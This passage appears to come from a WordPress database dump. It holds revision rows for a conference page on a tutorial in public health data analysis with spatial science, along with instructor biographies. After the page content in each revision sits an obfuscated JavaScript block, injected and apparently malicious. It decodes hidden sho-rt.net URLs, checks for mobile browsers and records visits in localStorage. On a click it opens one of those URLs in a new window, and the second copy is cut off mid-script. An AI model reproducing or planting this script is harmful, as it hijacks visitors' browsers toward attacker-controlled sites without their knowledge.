post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"70\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<!-- wp:paragraph --></p>\n<p>&nbsp;</p>\n<p><img class=\"alignnone wp-image-3691\" src=\"https://gsw2023.com/wp-content/uploads/2023/02/tut1.jpg\" alt=\"\" width=\"79\" height=\"106\" /></p>\n<p>DR.<a href=\"https://gsw2023.com/index.php/dt_team/sameer-saran/\"><strong>Sameer Saran</strong></a></p>\n<p>Geoinformatics Department, Indian Institute of Remote Sensing, Dehradun, INDIA</p>\n<!-- /wp:paragraph --> <!-- wp:paragraph -->\n<p><strong>ISPRS Chair, WG IV/10</strong></p>\n<!-- /wp:paragraph --> <!-- wp:paragraph -->\n<p>Dr. Sameer Saran is a Senior Scientist and Head, Geoinformatics Department at Indian Institute of Remote Sensing (ISRO). He is currently serving as Deputy General Secretary of AARS representing India. He has also served as Co-Chair for ISPRS TC V/3 working group on Geospatial Technology and Citizen Science for the year 2016-22.  His interest is Web GIS, spatial database &amp; modelling, citizen science, 3D city modelling &amp; geo-health.</p>\n<p>&nbsp;</p>\n<p><!-- /wp:paragraph -->[/vc_column_text][vc_separator border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<img class=\"alignnone size-full wp-image-3694\" src=\"https://gsw2023.com/wp-content/uploads/2023/02/tut2.jpg\" alt=\"\" width=\"75\" height=\"95\" /></p>\n<p class=\"fancy-title entry-title start-animation-done start-animation\">Dr.Frank B Osei</p>\n<p>Faculty of Geo-Information Science &amp; Earth Observation, University of Twente, The NL</p>\n<p><strong>ISPRS Co-Chair, WG IV/10</strong> Dr. F. B. Osei is a Faculty of Geo-Information Science and Earth Observation (ITC) in Department of Earth Observation Science (EOS), University of Twente, the Netherlands. He is editorial member of Spatial Statistics, Int. J. of Statistics in Medical Research, Geospatial Health, etc. His research interests are in GIS, geo-health, social sciences, life sciences, earth and environmental sciences.[/vc_column_text][vc_separator border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<img class=\"alignnone size-full wp-image-3697\" src=\"https://gsw2023.com/wp-content/uploads/2023/02/tut3.jpg\" alt=\"\" width=\"71\" height=\"79\" /></p>\n<p>Dr. Dilek KOC-SAN</p>\n<p>Department of Urban and Regional Planning, Akdeniz University, TURKEY</p>\n<p><strong>ISPRS Co-Chair, WG IV/10</strong></p>\n<p>Dr. Dilek KOC-SAN is a</p>\n<p>Faculty of Architecture in Department of Urban and Regional Planning, Akdeniz University. In 2009, she received PhD degree from Middle East Technical University, Dept. of Geodetic &amp; Geographic Information Technologies. Her research interests are GIS, image classification &amp; processing, automatic object extraction &amp; multi-criteria decision analysis.[/vc_column_text][vc_separator border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Public Health Data Handling, Analysis and Visualisation using Spatial Science','','inherit','closed','closed','','3681-revision-v1','','','2023-02-07 01:08:23','2023-02-07 01:08:23','',3681,'https://gsw2023.com/?p=3884',0,'revision','',0),
(3885,1,'2023-02-07 01:09:00','2023-02-07 01:09:00','<p>[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3685\" img_size=\"1200x1000\"][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\"><strong>Public Health Data Handling, Analysis and Visualisation using Spatial Science</strong></h5>\n<h6></h6>\n<h6><strong>Tutorial Topic</strong></h6>\n<p style=\"text-align: justify;\"><strong><span style=\"font-size: 12pt;\">The past century has seen an unprecedented burden of infectious, chronic and vector-borne diseases that threaten the public and global health. There are also direct implications on wildlife populations. Understanding the spatial processes and temporal dynamics are important for guiding policy informed decisions. Policymakers, public health officials, and academic researchers are key stakeholders in the fight against diseases. For instance, the recent COVID-19 pandemic has generated tremendous amount of data which is of prime importance. The availability of spatial tools with analytical &amp; visualization capability provided meaningful insights in handling public health data for scientific understanding of disease trends and patterns. Hence, there is a clear need of simple one-stop solution that is backed by reliable data source.</span></strong></p>\n<p style=\"text-align: justify;\"><strong><span style=\"font-size: 12pt;\">In this tutorial, we focus on techniques and spatial tools for (i) optimal data collection on disease occurrence and surveillance through citizen-centric approach, (ii) machine learning based statistical modelling tools for active surveillance, and (iii) analysing the spatial complexity of diseases through visualization support.</span></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<img class=\"alignnone size-full wp-image-3699\" src=\"https://gsw2023.com/wp-content/uploads/2023/02/tut4.jpg\" alt=\"\" width=\"74\" height=\"82\" /></p>\n<p>Dr. Priyanka Singh</p>\n<p>School of Computer Sciences, University of Petroleum &amp; Energy Studies, Dehradun, INDIA</p>\n<p><strong>ISPRS Secretary, WG IV/10</strong> Dr. Priyanka Singh is a Faculty of Computer Science in University of Petroleum and Energy Studies, India. She received her PhD in Data Science from IIT(ISM) and IIRS (ISRO), India in 2019. She received international and national awards in field of spatial sciences. Her research interests are Applied machine learning, WebGIS, citizen science, predictive analytics, geo-health and spatial modelling and analytics.[/vc_column_text][vc_separator border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\">Short Profile &amp; Affiliation of Instructors</h4>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<!-- wp:paragraph --></p>\n<p>&nbsp;</p>\n<p><img class=\"alignnone wp-image-3691\" src=\"https://gsw2023.com/wp-content/uploads/2023/02/tut1.jpg\" alt=\"\" width=\"79\" height=\"106\" /></p>\n<p>DR.<a href=\"https://gsw2023.com/index.php/dt_team/sameer-saran/\"><strong>Sameer Saran</strong></a></p>\n<p>Geoinformatics Department, Indian Institute of Remote Sensing, Dehradun, INDIA</p>\n<!-- /wp:paragraph --> <!-- wp:paragraph -->\n<p><strong>ISPRS Chair, WG IV/10</strong></p>\n<!-- /wp:paragraph --> <!-- wp:paragraph -->\n<p>Dr. Sameer Saran is a Senior Scientist and Head, Geoinformatics Department at Indian Institute of Remote Sensing (ISRO). He is currently serving as Deputy General Secretary of AARS representing India. He has also served as Co-Chair for ISPRS TC V/3 working group on Geospatial Technology and Citizen Science for the year 2016-22.  His interest is Web GIS, spatial database &amp; modelling, citizen science, 3D city modelling &amp; geo-health.</p>\n<p>&nbsp;</p>\n<p><!-- /wp:paragraph -->[/vc_column_text][vc_separator border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<img class=\"alignnone size-full wp-image-3694\" src=\"https://gsw2023.com/wp-content/uploads/2023/02/tut2.jpg\" alt=\"\" width=\"75\" height=\"95\" /></p>\n<p class=\"fancy-title entry-title start-animation-done start-animation\">Dr.Frank B Osei</p>\n<p>Faculty of Geo-Information Science &amp; Earth Observation, University of Twente, The NL</p>\n<p><strong>ISPRS Co-Chair, WG IV/10</strong> Dr. F. B. Osei is a Faculty of Geo-Information Science and Earth Observation (ITC) in Department of Earth Observation Science (EOS), University of Twente, the Netherlands. He is editorial member of Spatial Statistics, Int. J. of Statistics in Medical Research, Geospatial Health, etc. His research interests are in GIS, geo-health, social sciences, life sciences, earth and environmental sciences.[/vc_column_text][vc_separator border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<img class=\"alignnone size-full wp-image-3697\" src=\"https://gsw2023.com/wp-content/uploads/2023/02/tut3.jpg\" alt=\"\" width=\"71\" height=\"79\" /></p>\n<p>Dr. Dilek KOC-SAN</p>\n<p>Department of Urban and Regional Planning, Akdeniz University, TURKEY</p>\n<p><strong>ISPRS Co-Chair, WG IV/10</strong></p>\n<p>Dr. Dilek KOC-SAN is a</p>\n<p>Faculty of Architecture in Department of Urban and Regional Planning, Akdeniz University. In 2009, she received PhD degree from Middle East Technical University, Dept. of Geodetic &amp; Geographic Information Technologies. Her research interests are GIS, image classification &amp; processing, automatic object extraction &amp; multi-criteria decision analysis.[/vc_column_text][vc_separator border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return 